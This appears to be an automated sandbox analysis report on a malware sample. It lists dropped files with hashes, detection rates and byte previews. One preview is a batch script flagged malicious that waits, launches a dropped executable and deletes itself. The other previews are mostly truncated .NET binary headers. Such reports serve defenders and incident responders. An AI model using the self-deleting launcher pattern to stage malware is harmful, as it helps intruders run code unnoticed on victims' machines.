                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49152
                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.403856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:BfkcUo8zO:kowO
                                                                                                                  MD5:847081DB2FE6097CFD6201FBF0EA05D7
                                                                                                                  SHA1:4C97F78F28E237C1DBB2620133726464015B845E
                                                                                                                  SHA-256:94276B1ABE83EB6659934313CFA7A1078A96EF6355565BAC2A104C0EA924D9A1
                                                                                                                  SHA-512:434566E7A360CEDB738A00F0053F8452728DCCC2D34D6905DA3C0040F494430F62353F253C6AE7A06293DCB9C9CF13E9D070E3CE33D5BF2A4C66D83D2AE13548
                                                                                                                  Malicious:false
                                                                                                                  Preview:4brIR94Pr2QyMVX0tfTKYe3h9
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.243856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:b0thUNn:AsNn
                                                                                                                  MD5:1F5F83D9A4DF4B06A8E1D70962AB928C
                                                                                                                  SHA1:09AA0AC9E0FE2989534306F7BEE4891432B8CB6F
                                                                                                                  SHA-256:D03864B8357424EE90AE0397E7F983A41EB19A6B5BDE95110ED09613F9A1D87B
                                                                                                                  SHA-512:96AED24966503555D36CC1C267E7DAB80D3BF882B535DFB5990E064D77EC109CAA5AF86E69FE4EE6B3A13F05CD7BEA6D7B06EBDF0ABDF93AE56789D8AA80B8B6
                                                                                                                  Malicious:false
                                                                                                                  Preview:EXQ6fwGYPv2k6bITXmuQafqjP
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):178
                                                                                                                  Entropy (8bit):5.3006650186981545
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQXJN+KilHiOkVfKbBktKcKZG1t+kiE2J5xAID:hCRLuVFOOr+DE1WD5XJQKiljbKOZG1wj
                                                                                                                  MD5:609BB83D98153B00DD92B7D11425F20A
                                                                                                                  SHA1:23AA8796919915F75E2527371080453A1DF62F0E
                                                                                                                  SHA-256:5FF980252ECAD9BEDC9179428D865B3E80C28896C82D5FE239C0B91948D213C9
                                                                                                                  SHA-512:017BBC6E363CCFEF995A8659ED2700DBB9158EF00C243BE53D6EEB6CD634677BB5DA21481FBED6E35B494E1C40D6827EFBD8F680160FBCE7A12055A421D2F7E1
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\y7jCVExOhX.bat"
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Detection: malicious, Browse
                                                                                                                  • Filename: T3xpD9ZaYu.exe, Detection: malicious, Browse
                                                                                                                  • Filename: AvQTFKdsST.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse
                                                                                                                  • Filename: VL1xZpPp1I.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Detection: malicious, Browse
                                                                                                                  • Filename: oG6R4bo1Rd.exe, Detection: malicious, Browse
                                                                                                                  • Filename: BN57miasVe.exe, Detection: malicious, Browse
                                                                                                                  • Filename: YhyZwI1Upd.exe, Detection: malicious, Browse
                                                                                                                  • Filename: i3F8zuP3u9.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
